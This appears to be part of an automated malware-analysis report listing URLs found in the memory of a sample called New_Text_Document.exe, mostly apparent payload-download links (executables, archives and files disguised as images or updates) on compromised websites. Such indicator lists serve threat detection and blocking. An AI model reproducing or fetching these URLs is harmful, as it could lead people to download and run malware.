                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://omegaservices.fr/eieb/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://opesjk.ug/asdfg.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://orgsaojorge.com.br/emn/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ozvita.club/wp-includes/kpmlgj_715340/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://p2.shared.global.fastly.net
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://p4936.webmo.fr/wp-admin/FKTynV/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://parallel.rockvideos.at/n9h1k9gwt.gif
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://parrotbay.net/wisr1qas.jpg
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://partadino.ac.ug/ghjkl.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://partotaprayan.com/aq/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pink99.com/logsite/0LDDOC/TKA1833163913SOXCJH/Aug-11-2018-06005952849/NVS-VJXV/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pmjo.fra1.cdn.digitaloceanspaces.com/Kriwgshughb.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://posmicrosystems.com/OCT/05eo9y/yho7cb662821oxuq416ncv9m0g/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://posmicrosystems.com/common_resource/3ZYNn88Sm_QdY9vaOqlXKYn_989270539154_n7FFnMeyjem/36660133
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://prestigehomeautomation.net/43rf3dw/34frgegrg.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://protechasia.com/cliopmq/cluton.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://qmsled.com/stamped.scr
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://quickie.com.do/qs/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ramactools.net/DOC20220513HGY37845657488494338293TRDFEDNARC0559DOC0302732112202135JIHG25485/K
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ramactools.net/DOC20220513HGY37845657488494338293TRDFEDNARC0559DOC0302732112202135JIHG25485/N
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ramactools.net/DOC20220513HGY37845657488494338293TRDFEDNARC0559DOC0302732112202135JIHG25485/Z
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ramactools.net/image2021042GFREDS12322ERDQ1DOC03027382DOC20220513PRELIDOC20220513HGY378456574
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://rapture2.romangrey.net/blastematic/E0VO/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://rapture2.romangrey.net/blastematic/hOyCwvKXsnCg6Amj7v/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reifenquick.de/Scripts/hl8-8w4cs-6325/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://retailexpertscloud.com/cowhand.php
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://retailexpertscloud.com/exempt.php
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://retailexpertscloud.com/turnip.php
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://riscafaca.co/somu/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://rocknetwork.org/ul/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://rootsivyintschools.edu.pk/na/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://rusticironstore.com/clip.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://rydbergaren.se/wp-content/uploads/2022/06/Attached_Amir_Levine_Epub_File.pdf
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://safetygear.pk/ghjk.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sainzim.co.za/blewthkht.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sakentoshi.ru/download/mstsc.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sambhavpay.com/et/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sattamatka-no.com/sar/
                    Source: explorer.exe, 0000000C.00000002.2517881359.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.1295068466.0000000007C70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.2517943433.0000000008820000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.0000000003311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://scientific.pk/ghjkl.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://scproducts.co.za/adis/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sd-1093121-h00002.ferozo.net/wp-content/YQ7IkSjIEP9r/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sd-1684625-h00001.ferozo.net/PaginaMasVieja1321654/F1M5dBu8axuQkx0p8/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sd-1684625-h00001.ferozo.net/PaginaMasVieja1321654/VXbZo/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sdfhusdf-1252681487.cos.ap-chengdu.myqcloud.com/rc2.jpg
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secretmindcontrol.com/well-known/well-known.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sentirecomex.com/ua/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://server.easysalepage.in.th/jsasynci/8673380355246647760559.xlsb
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://server.toeicswt.co.kr/svr_netchecker/server.asp?V_COMMAND=3002&V_PROGNAME=SJPTManagerLauncher
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://shahu66.com/rc62n0.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://shg.ph/oei/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://shipminttracking.net/wp-content/uploads/2022/0999/i.png
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://silversoft.in/BR.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smsfunny.ir/sv/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smz.sh/files/W8vQdbz8.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sociallysavvyseo.com/PinnacleDynamicServices/pRlYMzvfuu5B/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://soft.110route.com/PAETools.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://softdl.360tpcdn.com/inst77player/inst77player_1.0.0.1.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://specnaznachenie.ru/download/mstsc.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://src1.minibai.com/uploads/thirdupload/5d3e8177e87cc.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://srv-fattureincloud.de/nutrbsters/4iBpiQUavIMb.exe
                    Source: svchost.exe, 00000016.00000002.2484894927.0000029804922000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2482346634.0000029804087000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://standards.iso.org/iso/19770/-2/2009/schema.xsd
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://static.cz01.cn/setup/%E9%A3%9E%E8%9B%BE%E5%B7%A5%E5%85%B7%E7%AE%B1.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://stayinoceancitymd.com/ow571qp9x.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://stdown.dinju.com/housenetshare.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sterlingfundinginc.com/wp-conte
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sterlingfundinginc.com/wp-content/uploads/2022/03/en-win-update.msi
